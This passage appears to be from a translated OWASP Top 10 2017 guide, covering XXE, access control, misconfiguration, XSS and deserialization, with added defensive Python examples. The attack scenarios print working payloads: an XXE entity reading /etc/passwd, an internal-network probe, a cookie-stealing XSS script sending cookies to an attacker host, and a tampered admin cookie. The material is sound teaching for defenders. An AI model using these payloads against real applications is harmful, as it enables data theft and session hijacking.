Scenario #2: A site does not use TLS for all pages, or supports weak encryption. An attacker monitors network traffic (e.g. on an insecure wireless network), downgrades the connection from HTTPS to HTTP, intercepts requests and steals the session cookie. The attacker then replays this cookie to hijack the (authenticated) user's session and modify the user's private data. The attacker could also alter all transmitted data, e.g. the recipient of a money transfer.

Scenario #3: The password database uses unsalted or simple hashes to store passwords. A file upload flaw allows an attacker to retrieve the password database. All the unsalted hashes can be recovered with a rainbow table of pre-calculated hashes. Hashes generated by simple or fast hash functions may be cracked by GPUs, even if they were salted.


References

OWASP

• OWASP Proactive Controls: Protect Data

• OWASP Application Security Verification Standard (V7, 9, 10)

• OWASP Cheat Sheet: Transport Layer Protection

• OWASP Cheat Sheet: User Privacy Protection

• OWASP Cheat Sheet: Password Storage and Cryptographic Storage

• OWASP Secure Headers Project; HSTS Cheat Sheet

• OWASP Testing Guide: Testing for Weak Cryptography

External

• CWE-202: Exposure of Sensitive Data Through Data Queries

• CWE-310: Cryptographic Issues; CWE-311: Missing Encryption

• CWE-312: Cleartext Storage of Sensitive Data

• CWE-319: Cleartext Transmission of Sensitive Data

• CWE-326: Weak Encryption; CWE-327: Broken or Risky Cryptographic Algorithm

• CWE-359: Exposure of Private Information (Privacy Violation)
A4:2017 XML External Entities (XXE)




Threat agents: application-specific.

Attack vectors (exploitability: 2): Attackers can exploit vulnerable XML processors by uploading XML or by injecting hostile content into XML documents, abusing vulnerable code, dependencies or components.

Security weakness (prevalence: 2, detectability: 3): By default, most older XML processors allow the specification of external entities, URIs that are dereferenced and evaluated during XML processing. SAST tools can discover the issue by inspecting dependencies and configuration. DAST tools require additional manual steps to detect and exploit it. Manual testers need to be trained in XXE testing, since such checks are not commonly performed.

Impacts (technical: 3; business: application-specific): These flaws can be used to extract data, execute remote requests from the server, scan internal systems, cause a denial of service and carry out other attacks. The business impact depends on the protection needs of all affected applications and data.


Is the application vulnerable?

Applications, and in particular XML-based web services or downstream components, are vulnerable in the following cases:

• the application accepts XML directly or via uploads, especially from untrusted sources, or inserts untrusted data into XML documents that are then parsed by an XML processor;

• any of the XML processors in the application or SOAP-based web services uses document type definitions (DTDs). Since the mechanism for disabling DTD processing depends on the processor, consult reference material such as the "OWASP XXE Prevention Cheat Sheet";

• the application uses SAML for identity processing within federated security or single sign-on (SSO). SAML uses XML for identity assertions and may therefore be vulnerable;

• the application uses SOAP prior to version 1.2. It is likely susceptible to XXE attacks if XML entities are passed to the SOAP framework;

• being vulnerable to XXE attacks also means the attacker can mount a denial-of-service attack, including the Billion Laughs attack.


How to prevent

Developer training is essential to identify and mitigate XXE. Besides that, preventing XXE requires:

• using less complex data formats such as JSON wherever possible, and avoiding serialization of sensitive data;

• patching or upgrading all XML processors and libraries in use by the application or on the underlying operating system. Use dependency checkers. Update SOAP to version 1.2 or higher;

• disabling XML external entity and DTD processing in all XML parsers of the application, as per the "OWASP XXE Prevention Cheat Sheet";

• implementing positive ("whitelist") server-side input validation, filtering or sanitization (escaping) to prevent hostile data from reaching XML documents, headers or nodes;

• verifying that XML or XSL file upload functionality validates incoming files using XSD validation or a similar technique;

• manually reviewing the code of large, complex applications with many integrations, although SAST tools can help detect XXE in source code.

If these controls are not possible, consider using virtual patching, API security gateways or web application firewalls (WAFs) to detect, monitor and block XXE attacks.
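What "disabling external entity and DTD processing in the parser" looks like in practice, as an added example that is not part of the original document, written for Python's standard library (the project's own guidance is the cheat sheet cited above). The approach is a gate: the input is first run through expat with handlers that abort on the first DOCTYPE or entity declaration, and only documents that pass are handed to ElementTree. This also blocks internal entity expansion, which the standard parser would otherwise perform and which is the basis of the Billion Laughs attack mentioned above. The sample documents are constructed; the XXE one mirrors the shape of Scenario #1 below.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat


class UnsafeXMLError(ValueError):
    """Raised for any document that carries a DTD or entity declaration."""


def reject_dtd(data):
    """Abort before any entity could be expanded or fetched."""
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXMLError(f"DOCTYPE {name!r} is not allowed")

    def on_entity(*decl):
        raise UnsafeXMLError("entity declarations are not allowed")

    def on_external_entity(context, base, system_id, public_id):
        return 0   # returning false makes expat stop instead of fetching the URI

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.ExternalEntityRefHandler = on_external_entity
    parser.Parse(data, True)


def parse_untrusted_xml(data):
    """Parse XML from an untrusted source (upload, SOAP body, SAML assertion)."""
    if isinstance(data, str):
        data = data.encode()
    reject_dtd(data)
    return ET.fromstring(data)


def is_rejected(data):
    """True if the gate refused the document."""
    try:
        parse_untrusted_xml(data)
    except UnsafeXMLError:
        return True
    return False


# Constructed inputs: a harmless document, a document shaped like Scenario #1,
# and a three-level entity expansion (the Billion Laughs shape, kept small).
SA_DOC = b'<?xml version="1.0"?><order><item sku="A-1" qty="2"/></order>'
XXE_DOC = (
    b'<?xml version="1.0" encoding="ISO-8859-1"?>\n'
    b'<!DOCTYPE foo [\n'
    b'<!ELEMENT foo ANY >\n'
    b'<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>\n'
    b'<foo>&xxe;</foo>'
)
EXPANSION_DOC = (
    b'<?xml version="1.0"?>\n'
    b'<!DOCTYPE lol [\n'
    b' <!ENTITY lol "lol">\n'
    b' <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;">\n'
    b' <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;">\n'
    b']>\n<lolz>&lol3;</lolz>'
)
```

Rejecting every DOCTYPE is stricter than only disabling external entities, but it is the setting the cheat sheet recommends where the application does not need DTDs, and it removes the need to reason about which of a parser's many entity-related switches are on by default.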


Example attack scenarios

Numerous public XXE issues have been discovered, including attacks on embedded devices. XXE occurs in a lot of unexpected places, including deeply nested dependencies. The easiest way to carry out the attack is to upload a malicious XML file, if accepted:

Scenario #1: The attacker attempts to extract data from the server:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>

Scenario #2: The attacker probes the server's private network by changing the ENTITY line above to:

<!ENTITY xxe SYSTEM "https://192.168.1.1/private" >]>

Scenario #3: The attacker attempts a denial-of-service attack by including a potentially endless file:

<!ENTITY xxe SYSTEM "file:///dev/random" >]>


References

OWASP

• OWASP Application Security Verification Standard

• OWASP Testing Guide: Testing for XML Injection

• OWASP: XXE Vulnerability

• OWASP Cheat Sheet: XXE Prevention

• OWASP Cheat Sheet: XML Security

External

• CWE-611: Improper Restriction of XML External Entity Reference

• Billion Laughs Attack (XML entity expansion)

• SAML Security XML External Entity Attack

• Detecting and Exploiting XXE in SAML Interfaces

A5:2017 Broken Access Control

Threat agents: application-specific.

Attack vectors (exploitability: 2): Exploiting access control is a core skill of attackers. SAST and DAST tools can detect the absence of access control but cannot verify that it works where it is present. Access control is detectable manually, and its absence can be detected automatically in some frameworks.

Security weakness (prevalence: 2, detectability: 2): Access control weaknesses are fairly common because of the lack of automated detection and of effective functional testing by developers. Access control is usually not covered by automated static or dynamic tests. Manual testing is the best way to detect missing or ineffective access control, including HTTP methods (GET, PUT, etc.), controllers, direct object references, etc.

Impacts (technical: 3; business: application-specific): Technical impact: an attacker acting as a user or administrator, a user using privileged functions, or creating, viewing, updating or deleting any record. The business impact depends on the protection needs of the application and data.


Is the application vulnerable?

Access control enforces a policy that defines what users are allowed to do. Bypassing access restrictions typically leads to unauthorized disclosure, modification or destruction of data, or to performing business functions outside the user's authority. The most common access control vulnerabilities include:

• bypassing access control checks by modifying the URL, the application's internal state or the HTML page, or by using a custom-built API attack tool;

• allowing the primary key to be changed to another user's record, permitting viewing or editing of someone else's account;

• elevation of privilege: acting as a user without being logged in, or acting as an administrator when logged in as a user;

• metadata manipulation, such as replaying or tampering with a JSON Web Token (JWT) access control token or a cookie, modifying hidden fields to elevate privileges, or abusing incorrect JWT invalidation;

• unauthorized API access because of a misconfigured cross-origin resource sharing (CORS) policy;

• unauthenticated users accessing pages that require authentication, or unprivileged users accessing privileged pages. Accessing APIs with missing access controls for POST, PUT and DELETE methods/requests.


Example attack scenarios

Scenario #1: The application uses unverified data in a SQL call that accesses account information:

pstmt.setString(1, request.getParameter("acct"));
ResultSet results = pstmt.executeQuery();

The attacker simply modifies the 'acct' parameter in the browser to send whatever account number they want. Without proper verification, the attacker can access any user's account.

http://example.com/app/accountInfo?acct=notmyacct

Scenario #2: The attacker simply forces the browser to a target URL. Administrator rights are required to access the admin page.

http://example.com/app/getappInfo

http://example.com/app/admin_getappInfo

The vulnerability exists if an unauthenticated user can access either page, or if a user without administrator rights can access the admin page.


How to prevent

Access control is only effective if enforced in trusted server-side code or a serverless API, where the attacker cannot modify the access control checks or metadata. It is recommended to:

• deny access by default, except for public resources;

• implement access control mechanisms once and reuse them throughout the application, and minimize cross-origin resource sharing;

• enforce record ownership in model access controls rather than accepting that users can create, read, update or delete any record;

• enforce unique application business-limit requirements with domain models;

• disable web server directory listing and ensure that file metadata (e.g. .git) and backup files are not present in web roots;

• log access control failures and alert administrators when appropriate (e.g. when failures repeat);

• rate-limit API and controller access to minimize the damage from automated attack tooling;

• invalidate JWT tokens on the server after logout.

Developers and QA staff should include functional access control unit and integration tests.
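The server-side checks that fix the two scenarios above, as an added example that is not part of the original document: Scenario #1 is closed by looking a record up by id and owner together, so that a foreign id and a non-existent id are indistinguishable and cannot be enumerated; Scenario #2 is closed by re-checking the administrator role on every request to the privileged page; writes go through the same ownership rule as reads; and every denial is recorded so that repeated failures from one user can raise an alert. The users, the accounts and the alert threshold are constructed assumptions standing in for a database and a monitoring rule.

```python
from dataclasses import dataclass, field


@dataclass(frozen=True)
class User:
    id: int
    roles: frozenset = field(default_factory=frozenset)


@dataclass
class Account:
    id: str
    owner_id: int
    balance: int


class AccessDenied(PermissionError):
    pass


# Constructed sample records (assumption: a database table in a real application).
ACCOUNTS = {
    "acct-100": Account("acct-100", owner_id=1, balance=500),
    "acct-200": Account("acct-200", owner_id=2, balance=9000),
}

# Every denial is recorded so repeated failures from one user can raise an alert.
DENIALS = []


def _require(allowed, user, action, resource):
    """Deny by default: nothing is granted unless a check explicitly passed."""
    if not allowed:
        DENIALS.append((None if user is None else user.id, action, resource))
        raise AccessDenied(f"{action} {resource}")


def get_account_info(user, acct_id):
    """Scenario #1, fixed: the record must belong to the caller. A foreign id and a
    missing id produce the same denial, so ids cannot be enumerated."""
    _require(user is not None, user, "read", acct_id)
    account = ACCOUNTS.get(acct_id)
    _require(account is not None and account.owner_id == user.id, user, "read", acct_id)
    return account


def get_admin_app_info(user):
    """Scenario #2, fixed: the privileged page re-checks the role server-side on every
    request; hiding the link in the UI is not an access control."""
    _require(user is not None and "admin" in user.roles, user, "read", "admin_getappInfo")
    return {"accounts": len(ACCOUNTS)}


def update_balance(user, acct_id, new_balance):
    """Writes use the same ownership rule as reads (PUT/POST/DELETE are not exempt)."""
    account = get_account_info(user, acct_id)
    account.balance = new_balance
    return account


def denied(fn, *args):
    """True if the call was refused; used to check the negative cases."""
    try:
        fn(*args)
    except AccessDenied:
        return True
    return False


def users_with_repeated_denials(threshold=3):
    """User ids whose denial count reached the alerting threshold."""
    counts = {}
    for user_id, _, _ in DENIALS:
        counts[user_id] = counts.get(user_id, 0) + 1
    return sorted(u for u, n in counts.items() if n >= threshold and u is not None)
```

The ownership condition lives in the data-access function rather than in the controller, so every code path that reaches an account, including any new API added later, inherits the check instead of having to remember it.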

References

OWASP

• OWASP Proactive Controls: Access Controls

• OWASP Application Security Verification Standard: V4 Access Control

• OWASP Testing Guide: Authorization Testing

• OWASP Cheat Sheet: Access Control

External

• CWE-22: Improper Limitation of a Pathname to a Restricted Directory (Path Traversal)

• CWE-284: Improper Access Control (Authorization)

• CWE-285: Improper Authorization

• CWE-639: Authorization Bypass Through User-Controlled Key

• PortSwigger: Exploiting CORS Misconfiguration
A6:2017 Security Misconfiguration

Threat agents: application-specific.

Attack vectors (exploitability: 3): Attackers will often attempt to exploit unpatched flaws, default accounts, unused pages, unprotected files and directories to gain unauthorized access or knowledge of the system.

Security weakness (prevalence: 3, detectability: 3): Security misconfiguration can happen at any level of an application stack, including the network services, platform, web services, server, database, frameworks, code and pre-installed virtual machines, containers or storage. Automated scanners can be used to find misconfigurations, default accounts, unnecessary services, legacy options, etc.

Impacts (technical: 2; business: application-specific): Such flaws give attackers unauthorized access to system data or functionality and may lead to a complete system compromise. The business impact depends on the protection needs of the application and data.


Is the application vulnerable?

The application is vulnerable if:

• any part of the application stack is insufficiently hardened, or permissions on cloud services are misconfigured;

• unnecessary features are enabled or installed (e.g. unnecessary ports, services, pages, accounts or privileges);

• default accounts and their passwords are still enabled and unchanged;

• error handling reveals stack traces or other overly informative error messages;

• the latest security updates are disabled or not configured securely;

• the security settings of application servers, frameworks (e.g. Struts, Spring, ASP.NET), libraries, etc. are not set to secure values;

• the server does not send security headers or directives, or they are not set to secure values;

• the software is out of date or vulnerable (see A9:2017-Using Components with Known Vulnerabilities).

Without a concerted, repeatable application security configuration process, systems are at a higher risk.


How to prevent

A secure installation process should be implemented, including:

• a repeatable hardening process that makes it fast and easy to deploy another environment that is properly locked down. Development, QA and production environments should all be configured identically, with different credentials used in each environment. The process should be automated to minimize the effort required to set up a new secure environment;

• a minimal platform without any unnecessary features, components, documentation and samples. Remove or do not install unused components or frameworks;

• a task to review and update the configurations appropriate to all security notes, updates and patches (see A9:2017-Using Components with Known Vulnerabilities), and in particular a review of cloud storage permissions (e.g. S3 bucket permissions);

• a segmented application architecture that provides effective, secure separation between components or tenants, with containerization or cloud security groups;

• sending security directives to clients, e.g. Security Headers;

• an automated process to verify the effectiveness of the configurations and settings in all environments.
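One building block of the automated verification the last bullet asks for, as an added example that is not part of the original document: a checker that inspects a single HTTP response and reports the misconfigurations named in this section (missing security headers such as HSTS and CSP, version leaks in Server or X-Powered-By, cacheable sensitive responses, stack traces in error pages, directory listings). The two sample responses are constructed; the header set, the stack-trace markers and the finding texts are the author's assumptions, and a real deployment would run a check like this against every environment from CI.

```python
import re

# Headers every response should carry, with the finding reported when absent.
REQUIRED_HEADERS = {
    "strict-transport-security": "HSTS missing: HTTPS is not enforced",
    "content-security-policy": "CSP missing: no browser-side XSS mitigation",
    "x-content-type-options": "X-Content-Type-Options missing: MIME sniffing allowed",
    "x-frame-options": "X-Frame-Options missing: page can be framed",
}
# Text fragments that only appear when an error page carries a stack trace (assumed).
STACK_TRACE_MARKERS = (
    "Traceback (most recent call last)", "Exception in thread", "\tat ", "Stack Trace",
)


def audit_response(status, headers, body, sensitive=False):
    """Return a list of misconfiguration findings for one HTTP response."""
    findings = []
    h = {k.lower(): v for k, v in headers.items()}
    for name, message in REQUIRED_HEADERS.items():
        if name not in h:
            findings.append(message)
    for leak in ("server", "x-powered-by"):
        if re.search(r"\d+\.\d+", h.get(leak, "")):
            findings.append(f"{leak} header leaks a version: {h[leak]!r}")
    if sensitive and "no-store" not in h.get("cache-control", "").lower():
        findings.append("sensitive response is cacheable (Cache-Control lacks no-store)")
    if status >= 500 and any(marker in body for marker in STACK_TRACE_MARKERS):
        findings.append("error page exposes a stack trace")
    if re.search(r"<title>Index of /", body):
        findings.append("directory listing is enabled")
    return findings


# Constructed sample responses: a default install and a hardened one.
WEAK = dict(
    status=500,
    headers={
        "Server": "Apache/2.4.29 (Ubuntu)",
        "X-Powered-By": "PHP/7.2.3",
        "Content-Type": "text/html",
    },
    body=(
        "<h1>Internal Server Error</h1><pre>Exception in thread \"main\" "
        "java.lang.NullPointerException\n\tat com.example.App.main(App.java:42)</pre>"
    ),
)
HARDENED = dict(
    status=200,
    headers={
        "Server": "app",
        "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
        "Content-Security-Policy": "default-src 'self'",
        "X-Content-Type-Options": "nosniff",
        "X-Frame-Options": "DENY",
        "Cache-Control": "no-store",
        "Content-Type": "text/html",
    },
    body="<h1>Account</h1>",
)
```

Run against the hardened sample the checker returns an empty list, which is the property a pipeline gate should assert on; a non-empty list on any environment means the environments have drifted from the agreed configuration.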


Example attack scenarios

Scenario #1: The application server comes with sample applications that are not removed from the production server. These sample applications have known security flaws that attackers use to compromise the server. If one of these applications is the admin console and default accounts were not changed, the attacker logs in with the default password and takes over.

Scenario #2: Directory listing is not disabled on the server. An attacker finds and downloads the compiled Java classes, decompiles and reverse-engineers them to view the source code. As a result, the attacker can find flaws and gain access to the application.

Scenario #3: The application server's configuration allows detailed error messages, e.g. stack traces, to be returned to users. This potentially exposes sensitive information, for example the version of a component that is known to be vulnerable.

Scenario #4: A cloud service provider has default sharing permissions open to the Internet for other cloud users. This allows sensitive data stored in cloud storage to be accessed.


References

OWASP

• OWASP Testing Guide: Configuration Management

• OWASP Testing Guide: Testing for Error Codes

• OWASP Secure Headers Project

For additional requirements in this area, see the "Application Security Verification Standard (ASVS): V19 Configuration".

External

• NIST Guide to General Server Hardening

• CWE-2: Environmental Security Flaws

• CWE-16: Configuration

• CWE-388: Error Handling

• CIS Security Configuration Guides/Benchmarks

• Amazon S3 Bucket Discovery and Enumeration
A7:2017 Cross-Site Scripting (XSS)

Attack vectors: Automated tools can detect and exploit all three forms of cross-site scripting, and freely available exploitation frameworks exist.

Security weakness: Cross-site scripting (XSS) is the second most prevalent issue in the OWASP Top 10 and is found in around two thirds of all applications. Automated tools can find XSS automatically, particularly in mature technologies such as PHP, J2EE / JSP and ASP.NET.

Impacts: The impact of XSS is moderate for reflected and DOM-based XSS, and severe for stored XSS, with remote code execution in the victim's browser, such as stealing credentials, hijacking sessions or delivering malware to the victim.


Is the application vulnerable?

There are three forms of XSS, usually targeting users' browsers:

Reflected XSS: The application or API includes unvalidated and unescaped user input as part of HTML output. A successful attack can allow the attacker to execute arbitrary HTML and JavaScript in the victim's browser. Typically the user will need to interact with a link that points to an attacker-controlled page, for example through a watering-hole attack or advertising.

Stored XSS: The application or API stores unsanitized user input that is viewed at a later time by other users or administrators. Stored XSS is usually considered a high or critical risk.

DOM XSS: JavaScript frameworks, single-page applications and APIs that dynamically include attacker-controllable data in a page are vulnerable to DOM XSS. Ideally, the application would not send attacker-controllable data to unsafe JavaScript APIs.

Typical XSS attacks include session hijacking, account takeover, MFA bypass, DOM-node replacement or defacement (such as trojan login panels), and attacks against the user's browser such as malicious software downloads, key logging and other client-side attacks.


How to prevent

Preventing XSS requires separating untrusted data from active browser content. This can be achieved by:

• using frameworks that automatically escape XSS by design, such as the latest Ruby on Rails and React JS. Learn the limitations of each framework's XSS protection and handle the uncovered cases appropriately.

• escaping untrusted HTTP request data based on the context in the HTML output (body, attributes, JavaScript, CSS or URL) to resolve reflected and stored XSS vulnerabilities. The "OWASP Cheat Sheet: XSS Prevention" has details on the required data escaping techniques.

• applying context-sensitive encoding when modifying the browser document on the client side to prevent DOM XSS. When this cannot be avoided, similar context-sensitive escaping techniques can be applied to browser APIs (see the "OWASP Cheat Sheet: DOM-based XSS Prevention").

• enabling a Content Security Policy (CSP) as a defense-in-depth control against XSS. It is effective if no other vulnerabilities exist that would allow placing malicious code via local file includes (e.g. path traversal, or vulnerable libraries from permitted content delivery networks).
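Context-sensitive escaping as the second bullet describes it, as an added example that is not part of the original document: the vulnerable concatenation from Scenario #1 below is placed next to an attribute-escaped version, with encoders for the JavaScript-string and URL-query contexts as well, and a small stand-in for the browser (the standard library's HTML parser) shows which elements each rendering actually produces. Python's html.escape plays the role the OWASP Java Encoder plays on the Java side; the payload is the one from Scenario #1 and serves here only as test input.

```python
import html
import json
from html.parser import HTMLParser
from urllib.parse import quote

# The Scenario #1 payload from this section, used only as input to the encoders.
PAYLOAD = ("'><script>document.location="
           "'http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'")


def render_vulnerable(cc):
    """Scenario #1 as written: the request parameter is concatenated into an attribute."""
    return "<input name='creditcard' type='TEXT' value='" + cc + "'>"


def render_attribute_safe(cc):
    """HTML attribute context: escape & < > \" and ' so the value can neither close
    the attribute nor the tag."""
    return "<input name='creditcard' type='TEXT' value='" + html.escape(cc, quote=True) + "'>"


def js_string_literal(value):
    """JavaScript context: JSON-encode, then escape < and > as \\uXXXX so the literal
    can never terminate an enclosing <script> block."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def decodes_back(value):
    """The JavaScript-context encoding is lossless: the browser sees the original string."""
    return json.loads(js_string_literal(value)) == value


def url_query_value(value):
    """URL query context: percent-encode everything that is not unreserved."""
    return quote(value, safe="")


class _Tags(HTMLParser):
    """Stand-in for the browser: records which elements it actually sees."""

    def __init__(self):
        super().__init__()
        self.tags, self.input_attrs = [], {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_attrs = dict(attrs)


def elements_seen(markup):
    """Return (tags in document order, attributes of the input element)."""
    parser = _Tags()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.input_attrs
```

With the vulnerable rendering the parser sees a second element, script, that the developer never wrote; with the escaped rendering it sees exactly one input whose value attribute is the payload as inert text. The point of having three encoders is that none of them is interchangeable: the attribute encoder does nothing useful inside a script block or a URL, which is why the bullet says "based on the context".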


Example attack scenarios

Scenario #1: The application uses untrusted data when building the following HTML snippet, without validating or escaping it:

(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";

The attacker modifies the 'CC' parameter in the browser to:

'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'

The victim's session ID is sent to the attacker's site, allowing the attacker to hijack the user's current session.

Note: an attacker can use XSS to defeat the cross-site request forgery (CSRF) protection used by the application.
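As an added example (not code from the OWASP document), the unsafe concatenation from Scenario #1 beside context-specific encoders for the HTML body, attribute, JavaScript string and URL contexts listed under "How to prevent", written in Python with only the standard library; the attacker payload is the one quoted in the scenario, and the function names are this example's own:

```python
import html
import json
from urllib.parse import quote

# Constructed sample: the payload from Scenario #1, as the attacker would
# submit it in the 'CC' parameter.
ATTACKER_CC = ("'><script>document.location='http://www.attacker.com/cgi-bin/"
               "cookie.cgi?foo='+document.cookie</script>'")


def render_cc_field_unsafe(cc_param: str) -> str:
    """The Scenario #1 pattern: untrusted input concatenated straight into HTML."""
    return "<input name='creditcard' type='TEXT' value='" + cc_param + "'>"


def encode_for_html_body(value: str) -> str:
    """HTML element content: & < > become entities, so no tag can be opened."""
    return html.escape(value, quote=False)


def encode_for_html_attribute(value: str) -> str:
    """Quoted attribute value: additionally encodes both quote characters, so the
    attacker cannot close value='...' and start a new tag."""
    return html.escape(value, quote=True)


def encode_for_js_string(value: str) -> str:
    """Value placed inside a JavaScript string literal: JSON escaping (quotes,
    backslashes, control and non-ASCII characters), plus '</' so the literal
    cannot terminate an enclosing <script> block."""
    return json.dumps(value)[1:-1].replace("</", "<\\/")


def encode_for_url_parameter(value: str) -> str:
    """Value placed in a URL query component: percent-encode everything non-alphanumeric."""
    return quote(value, safe="")


def render_cc_field_safe(cc_param: str) -> str:
    """Same field as the unsafe version, with attribute-context encoding applied."""
    return ("<input name='creditcard' type='TEXT' value='"
            + encode_for_html_attribute(cc_param) + "'>")


def contains_script_tag(rendered_html: str) -> bool:
    """Coarse check: did a new <script> element make it into the rendered output?"""
    return "<script" in rendered_html.lower()
```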


References

OWASP

• OWASP Proactive Controls: Encode Data
• OWASP Proactive Controls: Validate Data
• OWASP Application Security Verification Standard: V5
• OWASP Testing Guide: Testing for Reflected Cross-Site Scripting
• OWASP Testing Guide: Testing for Stored Cross-Site Scripting
• OWASP Testing Guide: Testing for DOM-based Cross-Site Scripting
• OWASP Cheat Sheet: XSS Prevention
• OWASP Cheat Sheet: DOM-based XSS Prevention
• OWASP Cheat Sheet: XSS Filter Evasion
• OWASP Java Encoder Project

External

• CWE-79: Improper Neutralization of User-Supplied Input
• PortSwigger: Client-side template injection
A8:2017 Insecure Deserialization

Threat agents / attack vectors: application specific. Exploitability: 1
Security weakness: Prevalence: 2. Detectability: 2
Impacts: Technical: 3. Business: ?

Attack vectors: Exploiting deserialization is difficult, since off-the-shelf exploits rarely work without modification or adaptation.

Security weakness: This vulnerability is included in the Top 10 based on an industry survey, not on quantifiable data. Some tools can detect deserialization flaws, but confirming them usually requires a specialist. As new tools for detecting and fixing deserialization flaws are developed, more prevalence data is expected.

Impacts: The consequences of deserialization flaws must not be underestimated. They can lead to remote code execution, one of the most dangerous vulnerabilities. The business impact depends on the protection needs of the application and its data.


Is the application vulnerable?

Applications and APIs are vulnerable if they deserialize hostile or tampered objects supplied by an attacker.

This enables two primary types of attack:

• object and data structure attacks, where the attacker modifies application logic or achieves arbitrary remote code execution if the application has access to classes whose behaviour can be changed during or after deserialization;

• data tampering attacks, such as those related to access control, where existing data structures are used but their content is changed.

Serialization may be used in applications for:

• remote and inter-process communication (RPC/IPC);
• wire protocols, web services, message brokers;
• caching or persisting data;
• databases, cache servers, file systems;
• HTTP cookies, HTML form parameters, API authentication tokens.

How to prevent

The only safe solution is to reject serialized objects from untrusted sources or to use a serialization medium that permits only primitive data types.

If this is not possible, the following is recommended:

• Integrity checks on serialized objects, for example digital signatures, to prevent hostile object creation or data tampering.

• Strict type constraints during deserialization, before the object is created, since the code expects a definable set of classes. Bypasses of this defence have been demonstrated, so relying on it alone is not recommended.

• Isolating the code that performs deserialization and running it in an environment with minimal privileges, where possible.

• Logging deserialization exceptions and failures, for example unexpected incoming types or exceptions thrown during deserialization.

• Restricting or monitoring incoming and outgoing network connections of containers or servers that perform deserialization.

• Monitoring deserialization and alerting when a user deserializes constantly.

Example attack scenarios

Scenario #1: A React application calls a set of Spring Boot microservices. Being functional programmers, the developers tried to keep their code immutable. The solution they chose serializes the user's state and passes it back and forth with every request. An attacker who notices the "R00" Java object signature can use the Java Serial Killer tool to gain remote code execution on the application server.

Scenario #2: A PHP forum uses PHP object serialization to store a "super cookie" containing the user's ID, role, password hash and other data:

a:4:{i:0;i:132;i:1;s:7:"Mallory";i:2;s:4:"user";i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}

The attacker modifies the serialized object to grant themselves administrator privileges:

a:4:{i:0;i:1;i:1;s:5:"Alice";i:2;s:5:"admin";i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}
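An added example (not the forum's or OWASP's code) that combines two of the recommendations under "How to prevent", an integrity check with a digital signature (HMAC) and a deserializer restricted to primitive types, applied to the super cookie from Scenario #2. The key, class and function names are this example's own, and the reader handles only PHP integers, strings, null and arrays:

```python
import hashlib
import hmac

# Constructed samples: the two cookies from Scenario #2, as bytes.
ORIGINAL_COOKIE = (b'a:4:{i:0;i:132;i:1;s:7:"Mallory";i:2;s:4:"user";'
                   b'i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}')
TAMPERED_COOKIE = (b'a:4:{i:0;i:1;i:1;s:5:"Alice";i:2;s:5:"admin";'
                   b'i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}')
# Hypothetical server-side signing key; a real one comes from a secret store.
DEMO_KEY = b"constructed-demo-key-do-not-reuse"

class UnsafeSerializedData(ValueError):
    """Signature check failed or the payload contains a disallowed type."""

class PrimitiveOnlyPhpUnserializer:
    """Minimal reader for PHP's serialize() text that accepts only integers,
    strings, null and arrays. Written for this example; it is not PHP's
    unserialize() and never instantiates objects, so O: and C: records are
    rejected instead of being rebuilt."""

    def __init__(self, data: bytes):
        self.data = data
        self.pos = 0

    def parse(self):
        value = self._value()
        if self.pos != len(self.data):
            raise UnsafeSerializedData("trailing bytes after the top-level value")
        return value

    def _expect(self, token: bytes):
        if not self.data.startswith(token, self.pos):
            raise UnsafeSerializedData(f"expected {token!r} at offset {self.pos}")
        self.pos += len(token)

    def _read_until(self, delim: bytes) -> bytes:
        end = self.data.find(delim, self.pos)
        if end < 0:
            raise UnsafeSerializedData("truncated payload")
        chunk = self.data[self.pos:end]
        self.pos = end + len(delim)
        return chunk

    def _value(self):
        tag = self.data[self.pos:self.pos + 1]
        if tag == b"N":                      # null
            self._expect(b"N;")
            return None
        if tag == b"i":                      # integer
            self._expect(b"i:")
            return int(self._read_until(b";"))
        if tag == b"s":                      # length-prefixed string
            self._expect(b"s:")
            length = int(self._read_until(b':"'))
            raw = self.data[self.pos:self.pos + length]
            if len(raw) != length:
                raise UnsafeSerializedData("declared string length exceeds payload")
            self.pos += length
            self._expect(b'";')
            return raw.decode("utf-8")
        if tag == b"a":                      # array of key;value pairs
            self._expect(b"a:")
            count = int(self._read_until(b":{"))
            result = {}
            for _ in range(count):
                key = self._value()
                if not isinstance(key, (int, str)):
                    raise UnsafeSerializedData("array keys must be int or string")
                result[key] = self._value()
            self._expect(b"}")
            return result
        # Objects (O:), custom-serialized objects (C:) and anything unknown: refuse.
        raise UnsafeSerializedData(f"type tag {tag!r} is not allowed in a cookie")

def sign_cookie(key: bytes, payload: bytes) -> bytes:
    """Append an HMAC-SHA256 tag over the serialized payload (the integrity check)."""
    mac = hmac.new(key, payload, hashlib.sha256).hexdigest().encode("ascii")
    return payload + b"|" + mac

def load_cookie(key: bytes, cookie: bytes):
    """Verify the signature first, then parse with the primitive-only reader."""
    payload, sep, mac = cookie.rpartition(b"|")
    if not sep:
        raise UnsafeSerializedData("cookie carries no signature")
    expected = hmac.new(key, payload, hashlib.sha256).hexdigest().encode("ascii")
    if not hmac.compare_digest(mac, expected):
        raise UnsafeSerializedData("signature mismatch: cookie was modified")
    return PrimitiveOnlyPhpUnserializer(payload).parse()

def try_load_cookie(key: bytes, cookie: bytes):
    """(True, data) when the cookie is accepted, (False, reason) when rejected."""
    try:
        return True, load_cookie(key, cookie)
    except UnsafeSerializedData as exc:
        return False, str(exc)
```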

References

OWASP

